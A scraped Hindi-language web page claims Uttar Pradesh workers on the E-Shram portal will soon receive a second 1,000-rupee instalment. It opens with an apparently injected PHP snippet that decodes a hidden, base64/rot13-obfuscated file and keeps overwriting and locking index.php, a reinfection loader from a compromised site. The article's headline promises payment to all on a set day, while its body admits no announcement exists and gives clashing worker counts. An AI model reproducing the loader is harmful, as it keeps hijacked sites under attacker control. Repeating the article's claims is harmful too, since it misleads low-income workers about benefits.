$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } E-Shram Card दूसरी क़िस्त : 1 हजार रुपये सभी को मिल रहे हैं, खाते में आयेंगे इस दिन पैसे । – E-Sharm

E-Shram Card दूसरी क़िस्त : 1 हजार रुपये सभी को मिल रहे हैं, खाते में आयेंगे इस दिन पैसे ।

Sharing Is Caring:

E-Shram Card दूसरी क़िस्त ?

दोस्तों यूपी सरकार के द्वारा राज्य के 1 करोड़ 50 लाख श्रमिकों को E-Shram Card के तहत पहली किस्त का लाभ दिया जा चुका है, आपको बताते चलें कि इस योजना में सभी श्रमिकों को दूसरी क़िस्त के रूप में 1000 रुपये की धनराशि  श्रमिक नागरिकों के बैंक अकाउंट में E-Shram Card की दूसरी क़िस्त जल्द ही ट्रांसफर किया जायेगा । यूपी राज्य के कुल पंजीकृत श्रमिकों की तादात 5 करोड़ 90 लाख 8 हजार 745 है, जिसमे से असंगठित क्षेत्र में काम करने वाले कामगारों की तादात 38160725 है । इसके साथ साथ BOCW बोर्ड के अंतर्गत राज्य के 12748020 काम करने वाले श्रमिक नागरिक पंजीकृत हैं, इस योजना के अंतर्गत पहले चरण में 1.50 करोड़ श्रमिकों को भरन पोषण भत्ता योजना के अंतर्गत ये वित्तीय राशि सीधे उनके बैंक अकाउंट में ट्रांसफर की जायेगी ।

E-Shram Card दूसरी क़िस्त : 1 हजार रुपये सभी को मिल रहे हैं

E-Shram Card दूसरी क़िस्त :- उत्तर प्रदेश सरकार के द्वारा राज्य के श्रमिक लोगों को आर्थिक मदद देने के लिए E-Shram पोर्टल में पंजीकृत सभी श्रमिकों को श्रमिक भरण पोषण योजना के अंतर्गत हर महीने 500 रुपये देने की घोषणा की गई है । यानी देखा जाए अब श्रमिकों को इस योजना के अंतर्गत 1000 रुपये E-Shram Card दूसरी क़िस्त भत्ता राशि लेने का लाभ मिलेगा, श्रमिकों, कुलियों, पल्लेदारों, रिक्शा चालकों आदि का काम करने वालों को इस भत्ता योजना का फायदा पहुंच रहा है । E-Shram पोर्टल में पंजीकृत श्रमिक लोगों को पहले चरण में उत्तर प्रदेश सरकार के जरिए 1500 करोड़ रुपये की धनराशि श्रमिकों को आवंटित की गई है, दोस्तों मीडिया रिपोर्ट के मुताबिक दूसरे चरण में राज्य सरकार के द्वारा 2 करोड़ 31 लाख श्रमिकों को वित्तीय मदद उनके बैंक अकाउंट में 1000 रुपये की धनराशि ट्रांसफर की जायेगी ।

1 हजार रुपये सभी को मिल रहे हैं ?

दोस्तों 31 दिसंबर 2021 तक E-Shram पोर्टल में रजिस्ट्रेशन करवाने वाले श्रमिकों को राज्य सरकार के द्वारा ये श्रमिक भरण पोषण भत्ता राशि दिये जा रहे हैं । आप लोगों को बता दें कि इस योजना के पहले चरण में 1.50 लाख श्रमिकों को 1500 करोड़ रुपये की धनराशि ट्रांसफर किया गया है, और इसके साथ दूसरे चरण में 2.31 करोड़ श्रमिकों को भत्ता राशि दिया जायेगा । जल्द ही श्रमिकों के बैंक अकाउंट में E-Shram Card दूसरी क़िस्त की धनराशि ट्रांसफर की जायेगी, लेकिन दोस्तों अभी तक सरकार के द्वारा दूसरी क़िस्त को लेकर कोई खबर नही दी गई है । विभिन्न प्रकार की श्रमिक योजनाओं का लाभ प्राप्त करने के लिए श्रमिकों को श्रम पोर्टल में अपना पंजीकृत करवाया जरूरी है । सरकार के द्वारा श्रम पोर्टल में पंजीकृत श्रमिकों को विभिन्न प्रकार की सुविधाओं का लाभ दिया जाता है ।

7 thoughts on “E-Shram Card दूसरी क़िस्त : 1 हजार रुपये सभी को मिल रहे हैं, खाते में आयेंगे इस दिन पैसे ।”

Leave a Comment

error: Content is protected !!